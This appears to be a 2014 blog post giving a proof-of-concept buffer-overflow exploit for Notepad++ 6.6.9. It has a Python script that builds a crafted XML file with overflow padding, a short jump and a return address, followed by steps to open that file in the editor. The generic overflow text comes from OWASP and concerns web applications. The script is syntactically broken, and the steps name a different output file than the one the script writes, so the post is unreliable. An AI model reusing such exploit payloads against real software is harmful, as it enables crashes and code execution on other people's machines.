Thursday, December 25, 2014

NotePad++ v6.6.9 <= Buffer Overflow

Attackers generally use buffer overflows to corrupt the execution stack of a web application. By sending carefully crafted input to a web application, an attacker can cause the web application to execute arbitrary code, possibly taking over the machine. Attackers have managed to identify buffer overflows in a staggering array of products and components. Buffer overflow flaws can be present in both the web server and application server products that serve the static and dynamic portions of a site, or in the web application itself. Buffer overflows found in commonly-used server products are likely to become widely known and can pose a significant risk to users of these products. When web applications use libraries, such as a graphics library to generate images or a communications library to send e-mail, they open themselves to potential buffer overflow attacks.

Literature detailing buffer overflow attacks against commonly-used products is readily available, and newly discovered vulnerabilities are reported almost daily. 

Buffer overflows can also be found in custom web application code, and may even be more likely, given the lack of scrutiny that web applications typically go through. Buffer overflow attacks against customized web applications can sometimes lead to interesting results. In some cases, we have discovered that sending large inputs can cause the web application or the back-end database to malfunction. It is possible to cause a denial of service attack against the web site, depending on the severity and specific nature of the flaw. Overly large inputs could cause the application to display a detailed error message, potentially leading to a successful attack on the system. 

Notepad++ is a free (as in "free speech" and also as in "free beer") source code editor and Notepad replacement that supports several languages.
It is running in the MS Windows environment, its use is governed by GPL License.

Based on the powerful editing component Scintilla, Notepad++ is written in C++ and uses pure Win32 API and STL which ensures a higher execution speed and smaller program size. By optimizing as many routines as possible without losing user friendliness, Notepad++ is trying to reduce the world carbon dioxide emissions. When using less CPU power, the PC can throttle down and reduce power consumption, resulting in a greener environment.

Steps to Reproduce
 
1. Use this exploit code and make a python file in your kali linux system.

Code : 

import struct
def little_endian(address):
  return struct.pack("poc ="\x41" * 591
poc+="\xeb\x06\x90\x90"
poc+=little_endian(0x1004C31F)
poc+="\x90" * 80
poc+="\x90" * (20000 - len(poc))
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc
footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"
exploit =  header + footer
filename = "notepad.xml"
file = open(filename , "w")
file.write(exploit)
file.close()

Create a python file with your favorite editor as I am using nano.

nano notepad_exploit.py












 2. Copy paste this exploit into that and save & exit.


3. Run that file with python command.

python notepad_exploit.py

4. Now document.xml file must be created. Let's see the content of that file with below command.

cat document.xml

5. Now copy that file to your current windows system.

6. Now lets analyze the windows performance now by opening notepad++.

Maximum CPU usage observed was 10%.

7. Now opened that document.xml file in notepad++ and observed CPU performance was as follows:


By analyzing windows performance it can be proved that notepad++ running very slow and if characters are inserted for input CPU performance hikes to 100%.

Credit:

# CVE:  CVE-2014-1004
# Author: TaurusOmar   
# Twitter: @TaurusOmar_
# Email:  taurusomar13@gmail.com
 
References - 
https://www.owasp.org/index.php/Buffer_Overflow 
http://www.horstmann.com/sjsu/spring2008/cs40/buffer-overflow1.jpg

1 comment:

Softql said...

Thanks for your blog And GOod information provide your blog more information our site Post processing